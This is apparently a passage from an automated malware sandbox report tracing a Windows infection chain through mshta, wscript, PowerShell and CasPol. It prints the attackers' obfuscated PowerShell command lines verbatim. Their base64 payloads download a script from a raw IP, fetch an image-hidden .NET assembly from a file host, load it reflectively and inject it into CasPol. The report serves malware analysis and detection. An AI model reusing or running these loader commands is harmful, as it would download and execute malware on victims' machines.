RSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnasterJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCF3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_044812B8 push ss; iretd 3_2_044812CB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_072F250B push esp; iretd 3_2_072F2515
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04CE2381 pushad ; retf 0007h7_2_04CE2382
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04CE3348 push esp; retf 7_2_04CE3351
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00434006 push ecx; ret 10_2_00434019
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004567F0 push eax; ret 10_2_0045680E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0045B9DD push esi; ret 10_2_0045B9E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00463EF3 push ds; retf 10_2_00463EEC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00455EBF push ecx; ret 10_2_00455ED2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_10002806 push ecx; ret 10_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00406128 ShellExecuteW,URLDownloadToFileW,10_2_00406128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00419BD4

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCF3
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
